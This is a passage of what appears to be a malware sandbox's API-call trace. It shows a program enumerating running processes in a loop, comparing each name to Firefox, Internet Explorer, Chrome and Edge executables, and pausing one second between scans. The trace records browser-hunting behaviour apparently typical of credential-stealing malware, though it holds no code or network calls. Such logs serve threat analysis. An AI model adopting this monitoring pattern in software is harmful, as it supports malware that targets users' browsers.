th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0226.222] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0226.222] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0226.222] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0226.222] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0226.222] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0226.223] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0226.223] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0226.223] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0226.223] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0226.223] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0226.224] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0226.224] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0226.224] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0226.224] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0226.224] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0226.224] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0226.225] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0226.225] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0226.225] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0226.225] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0226.225] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0226.225] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0226.225] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0226.225] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0226.225] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0226.226] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0226.226] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0226.226] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0226.226] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0226.226] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0226.227] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0226.227] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0226.227] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0226.227] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0226.227] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0226.227] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0226.227] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0226.227] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0226.227] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0226.227] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0226.228] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0226.228] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0226.228] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0226.228] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0226.228] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0226.229] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0226.229] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0226.229] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0226.229] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0226.229] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0226.230] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0226.230] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0226.230] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0226.230] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0226.230] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0226.230] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0226.230] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0226.230] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0226.230] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0226.230] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0226.231] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0226.231] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0226.231] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0226.231] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0226.231] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0226.232] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0226.232] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0226.232] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0226.232] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0226.232] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0226.232] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0226.232] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0226.233] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0226.233] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0226.233] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0226.233] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0226.233] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0226.233] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0226.233] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0226.233] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0226.234] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0226.234] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0226.234] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0226.234] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0226.234] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0226.235] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0226.235] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0226.235] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0226.235] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0226.235] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0226.236] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0226.236] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0226.236] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0226.236] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0226.236] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0226.236] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0226.236] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0226.236] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0226.236] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0226.237] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0226.237] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0226.237] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0226.237] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0226.237] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0226.237] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0226.238] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0226.238] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0226.238] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0226.238] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0226.238] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0226.239] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0226.239] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0226.239] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0226.239] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0226.239] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0226.239] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0226.239] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0226.239] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0226.239] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0226.239] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0226.240] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0226.240] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0226.240] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0226.240] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0226.240] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0226.241] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0226.241] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0226.241] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0226.241] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0226.241] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0226.242] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0226.242] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0226.242] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0226.242] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0226.242] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0226.242] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0226.242] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0226.242] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0226.242] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0226.242] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0226.243] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0226.243] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0226.243] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0226.243] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0226.243] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0226.244] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0226.244] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0226.244] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0226.244] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0226.244] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0226.244] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0226.245] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0226.245] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0226.245] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0226.245] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0226.245] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0226.245] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0226.245] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0226.245] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0226.245] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0226.246] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0226.246] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0226.246] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0226.246] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0226.246] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0226.247] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0226.247] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0226.247] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0226.247] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0226.247] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0226.247] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0226.247] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0226.247] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0226.247] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0226.247] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0226.248] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0226.248] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0226.248] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0226.248] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0226.248] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0226.249] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0226.249] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0226.249] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0226.249] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0226.249] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0226.250] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0226.250] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0226.250] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0226.250] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0226.250] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0226.250] lstrcmpiA (lpString1="gtjtdfe", lpString2="firefox.exe") returned 1 [0226.250] lstrcmpiA (lpString1="gtjtdfe", lpString2="iexplore.exe") returned -1 [0226.250] lstrcmpiA (lpString1="gtjtdfe", lpString2="chrome.exe") returned 1 [0226.250] lstrcmpiA (lpString1="gtjtdfe", lpString2="microsoftedgecp.exe") returned -1 [0226.250] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 0 [0226.251] CloseHandle (hObject=0xd4) returned 1 [0226.251] Sleep (dwMilliseconds=0x3e8) [0227.254] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0227.255] Process32First (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0227.256] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0227.256] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0227.256] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0227.256] lstrcmpiA 